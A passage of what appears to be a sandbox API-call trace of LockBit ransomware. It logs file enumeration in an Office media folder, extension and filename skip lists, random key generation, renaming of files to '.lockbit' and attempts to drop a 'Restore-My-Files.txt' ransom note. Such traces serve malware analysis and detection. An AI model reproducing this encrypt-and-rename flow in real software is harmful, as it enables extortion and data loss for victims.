lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0203.026] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0203.026] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD10299_.GIF.lockbit") returned 78 [0203.026] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD10299_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd10299_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0203.029] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0203.029] malloc (_Size=0x40068) returned 0x3df0008 [0203.029] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=315) returned 1 [0203.029] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.029] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.029] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0203.029] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.030] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.030] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0203.030] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0203.035] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD10299_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD10299_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0203.035] malloc (_Size=0xb2) returned 0x1fa2ed8 [0203.035] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0203.035] free (_Block=0x1fa2ed8) [0203.035] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD10299_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0203.035] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0203.035] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0203.035] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71969b00, ftCreationTime.dwHighDateTime=0x1bd8f90, ftLastAccessTime.dwLowDateTime=0xbc893c20, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x71969b00, ftLastWriteTime.dwHighDateTime=0x1bd8f90, nFileSizeHigh=0x0, nFileSizeLow=0x105, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD10300_.GIF", cAlternateFileName="")) returned 1 [0203.035] lstrcmpiW (lpString1=".", lpString2="BD10300_.GIF") returned -1 [0203.035] lstrcmpiW (lpString1="..", lpString2="BD10300_.GIF") returned -1 [0203.035] PathFindExtensionW (pszPath="BD10300_.GIF") returned=".GIF" [0203.036] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0203.036] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0203.036] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0203.036] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0203.036] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0203.036] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0203.036] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0203.036] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0203.036] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0203.036] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0203.036] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0203.036] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0203.036] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0203.036] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0203.036] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0203.036] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0203.036] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0203.036] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0203.036] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0203.036] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0203.036] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0203.036] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0203.036] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0203.036] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0203.036] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.036] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0203.036] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0203.037] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0203.037] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0203.037] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0203.037] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0203.037] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0203.037] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0203.037] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0203.037] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0203.037] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0203.037] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0203.037] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0203.037] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0203.037] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0203.037] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0203.037] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0203.037] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.037] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0203.037] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0203.037] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0203.037] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0203.037] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD10300_.GIF") returned 1 [0203.037] lstrcmpiW (lpString1="ntldr", lpString2="BD10300_.GIF") returned 1 [0203.037] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD10300_.GIF") returned 1 [0203.037] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD10300_.GIF") returned 1 [0203.037] lstrcmpiW (lpString1="autorun.inf", lpString2="BD10300_.GIF") returned -1 [0203.037] lstrcmpiW (lpString1="thumbs.db", lpString2="BD10300_.GIF") returned 1 [0203.037] lstrcmpiW (lpString1="iconcache.db", lpString2="BD10300_.GIF") returned 1 [0203.037] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0203.038] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD10300_.GIF") returned=".GIF" [0203.038] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0203.038] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0203.038] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0203.038] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0203.038] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0203.038] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0203.038] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0203.038] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0203.038] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0203.038] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0203.038] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0203.038] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0203.038] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0203.038] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0203.038] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0203.038] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0203.038] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0203.038] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0203.038] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0203.038] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0203.038] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0203.038] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0203.038] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0203.038] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0203.038] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0203.038] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0203.038] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0203.039] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0203.039] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD10300_.GIF.lockbit") returned 78 [0203.039] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD10300_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd10300_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0203.040] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0203.040] malloc (_Size=0x40068) returned 0x3df0008 [0203.040] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=261) returned 1 [0203.040] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.041] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.041] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0203.041] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.041] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.042] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0203.042] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0203.046] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD10300_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD10300_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0203.046] malloc (_Size=0xb2) returned 0x1fa2ed8 [0203.046] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0203.046] free (_Block=0x1fa2ed8) [0203.046] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD10300_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0203.046] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0203.046] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0203.046] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71969b00, ftCreationTime.dwHighDateTime=0x1bd8f90, ftLastAccessTime.dwLowDateTime=0xbc893c20, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x71969b00, ftLastWriteTime.dwHighDateTime=0x1bd8f90, nFileSizeHigh=0x0, nFileSizeLow=0x109, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD10301_.GIF", cAlternateFileName="")) returned 1 [0203.046] lstrcmpiW (lpString1=".", lpString2="BD10301_.GIF") returned -1 [0203.046] lstrcmpiW (lpString1="..", lpString2="BD10301_.GIF") returned -1 [0203.046] PathFindExtensionW (pszPath="BD10301_.GIF") returned=".GIF" [0203.047] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0203.047] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0203.047] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0203.047] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0203.047] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0203.047] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0203.047] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0203.047] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0203.047] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0203.047] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0203.047] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0203.047] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0203.047] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0203.047] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0203.047] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0203.047] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0203.047] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0203.047] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0203.047] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0203.047] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0203.047] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0203.047] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0203.047] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0203.047] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0203.047] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.047] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0203.047] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0203.047] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0203.047] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0203.047] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0203.047] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0203.047] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0203.047] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0203.048] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0203.048] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0203.048] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0203.048] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0203.048] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0203.048] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0203.048] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0203.048] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0203.048] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0203.048] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.048] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0203.048] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0203.048] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0203.048] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0203.048] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD10301_.GIF") returned 1 [0203.048] lstrcmpiW (lpString1="ntldr", lpString2="BD10301_.GIF") returned 1 [0203.048] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD10301_.GIF") returned 1 [0203.048] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD10301_.GIF") returned 1 [0203.048] lstrcmpiW (lpString1="autorun.inf", lpString2="BD10301_.GIF") returned -1 [0203.048] lstrcmpiW (lpString1="thumbs.db", lpString2="BD10301_.GIF") returned 1 [0203.048] lstrcmpiW (lpString1="iconcache.db", lpString2="BD10301_.GIF") returned 1 [0203.048] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0203.048] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD10301_.GIF") returned=".GIF" [0203.048] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0203.048] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0203.048] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0203.048] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0203.048] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0203.048] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0203.048] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0203.048] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0203.048] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0203.049] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0203.049] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0203.049] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0203.049] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0203.049] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0203.049] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0203.049] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0203.049] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0203.049] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0203.049] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0203.049] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0203.049] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0203.049] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0203.049] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0203.049] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0203.049] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0203.049] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0203.049] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0203.049] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0203.049] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD10301_.GIF.lockbit") returned 78 [0203.049] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD10301_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd10301_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0203.051] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0203.051] malloc (_Size=0x40068) returned 0x3df0008 [0203.051] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=265) returned 1 [0203.051] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.051] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.051] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0203.051] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.052] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.052] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0203.052] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0203.056] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD10301_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD10301_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0203.056] malloc (_Size=0xb2) returned 0x1fa2ed8 [0203.056] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0203.056] free (_Block=0x1fa2ed8) [0203.056] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD10301_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0203.056] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0203.056] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0203.056] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72c7c800, ftCreationTime.dwHighDateTime=0x1bd8f90, ftLastAccessTime.dwLowDateTime=0xbc8b9d80, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x72c7c800, ftLastWriteTime.dwHighDateTime=0x1bd8f90, nFileSizeHigh=0x0, nFileSizeLow=0xfd, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD10302_.GIF", cAlternateFileName="")) returned 1 [0203.056] lstrcmpiW (lpString1=".", lpString2="BD10302_.GIF") returned -1 [0203.056] lstrcmpiW (lpString1="..", lpString2="BD10302_.GIF") returned -1 [0203.056] PathFindExtensionW (pszPath="BD10302_.GIF") returned=".GIF" [0203.056] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0203.056] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0203.056] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0203.057] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0203.057] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0203.057] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0203.057] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0203.057] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0203.057] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0203.057] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0203.057] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0203.057] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0203.057] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0203.057] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0203.057] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0203.057] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0203.057] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0203.057] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0203.057] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0203.057] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0203.057] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0203.057] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0203.057] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0203.057] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0203.057] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.057] lstrcmpiW (lpString1=".shs", 